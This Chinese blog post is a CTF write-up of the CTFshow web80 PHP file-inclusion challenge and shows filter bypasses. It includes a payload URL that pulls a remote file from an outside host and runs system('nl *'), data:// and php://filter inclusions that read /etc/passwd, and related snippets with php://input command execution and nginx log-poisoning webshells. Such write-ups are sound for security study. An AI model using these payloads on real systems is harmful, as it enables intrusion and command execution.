php文件包含-CTFshow-web80

最新推荐文章于 2024-07-04 14:42:56 发布
最新推荐文章于 2024-07-04 14:42:56 发布
阅读量576 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/119090372
版权

0 前言

前面我通过 2 个 CTF 题目来讲解了各种协议在文件包含时的简单用法。这篇文章主要是对 web80 做个简要的分析。

1 解题思路

在 web79 中只过滤了 php,而在 web80 中过滤了 phpdata。两个题都是使用 str_replace 进行过滤,所以 web80 的思路和 web79 是一样的。

  1. 利用大小写绕过 str_replace 函数。(经过测试data 协议无法使用 DATA 绕过。php 伪协议则只能使用 php://input 协议,不能使用 php://filter)。
  2. 使用其他协议,尽量避免使用关键字。

2 Payload

这里只进行简单介绍,具体做法参考 web79

2.1 http://

将题目的 URL 进行替换后访问链接,查看网页源码即可获得flag。

http://46399124-ff7e-4684-8e6b-e48ce59c51d8.challenge.ctf.show:8080/?file=https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval&code=system('nl *');

2.2 data://

关于 data 协议的测试代码:

<?php

include("DATA:text/plain,<?=`nl *`?>"); // 无法执行
include("data:text/plain,<?=`nl *`?>"); // 正常执行
include("PHP://filter/convert.base64-encode/resource=/etc/passwd"); // 正常执行
include("php://filter/convert.base64-encode/resource=/etc/shells"); // 正常执行

?>

3 总结

php 使用大小写都可以执行,data 使用小写可以执行,使用大写却不可以。感觉这种设计好奇怪呐。

果然,实践是检验真理的唯一标准。

chiehw
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 文件包含 web80
Kradress的博客
12-08 890
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-web80(文件包含)
m0_62094846的博客
01-13 1826
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){ $file = $_G..
ctfshow-web80
m0_73303597的博客
01-04 618
自用
ctfshow web80-88
weixin_58519918的博客
04-19 3642
web80) 构建/?file=Php://input post: <?php system("tac fl0g.php")?>【php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。】 因为我在网上看大部分都使用burp来解决这个题目,然后我的burp他在虚拟机里面一直没有落实在本机
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 1868
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
ctfshow 日志包含Web80-81
m0_62584974的博客
04-16 6214
2022/4/16 题目过滤了php和data,我们这次要用日志文件包含 先抓包 nginx日志的默认路径为/var/log/nginx. ssh日志的默认路径为/var/log/auth.log SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述 现在要将恶意代码写入日志文件 /?file=/var/log/nginx/access.log &
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
php-web-counter.zip_php_php-web-count
09-20
在"php-web-counter.zip"这个压缩包中,包含了一个基本的PHP网页计数器实现。通过解压并部署到Web服务器上,你可以轻松地为你的网站添加访问量统计功能。这个计数器的核心原理是利用服务器端的PHP脚本来处理页面访问...
Falcon-Web服务器文件监控平台 0.1.1.zip
05-25
Falcon是一款基于inotify-tools开发的Web服务器文件监控平台,能够实时监控Web目录文件变化(新增,修改,删除),判断文件内容是否包含恶意代码,自动隔离常见Webshell,保证Web目录文件安全。 Falcon 0.1.1 更新...
rf.rar_WEB开发_PHP-PERL_
08-12
通常,一个Web开发项目会包含HTML、CSS、JavaScript文件(用于前端)、PHP或Perl脚本(后端逻辑)、数据库配置文件、图片资源、文档说明等。如果这个压缩包确实包含了一个PHP企业客户管理系统,那么我们可能期望找到...
ctfshow-web80、81
m0_73590931的博客
08-11 395
然后,代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?,第二次替换将file中的data字符串替换为?首先,代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent,那还是在user-agent中插入一句话木马,后续做法与web80一样。最后,代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息,发现是nginx服务器。
[ctfshow web入门]常用姿势801-806
weixin_45751765的博客
04-14 4304
php单引号和双引号包裹的区别
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4509
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2397
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
Ctfshow web入门-web79-web81 WP
qq_45427131的博客
05-23 1293
web79 查看源码发现没有过滤,直接php伪协议包含 知识点——php伪协议 ,伪协议有很多,文件包含可以用php://filter payload: ?file=php://filter/read=convert.base64-encode/resource=需要包含的文件 执行,获取到base64加密之后的字符串然后解码 web80 查看代码,发现str_replace过滤了php,这个可以用大小写绕过,但是这里不推荐,因为能data命令执行 知识点——data命令执行: data:text/
《CTFshow-Web入门》09. Web 81~90
学习学习学习......
09-01 1457
include() 利用,一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用,伪协议(php://filter/)、伪协议(data://)、PHP 特性之 intval()。
ctfshow-web入门-文件包含web78、web79、web80web81)
最新发布
Welcome To Myon'Blog !
07-04 1359
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
CTFSHOW WEB入门
qq_51558360的博客
10-11 4370
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robots后台泄露 phps源码泄露 根据题目猜测输入index.phps 下载到一个index.phps打开得到flag 源码压缩包泄露 访问www.zip 没有flag,尝试访问fl000g.txt 版本控制泄露源码 Git是一个开源的分布式版本控制系统 git代码泄露,git上传代码会在目录创
ctfshow web入门文件上传
09-29
这样,每个PHP文件都会包含我们上传的恶意代码。 另一种方法是通过修改上传文件的Content-Type来绕过服务器对文件类型的过滤。比如,可以先上传一个zip文件,然后通过抓包工具修改请求的Content-Type为image/png,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值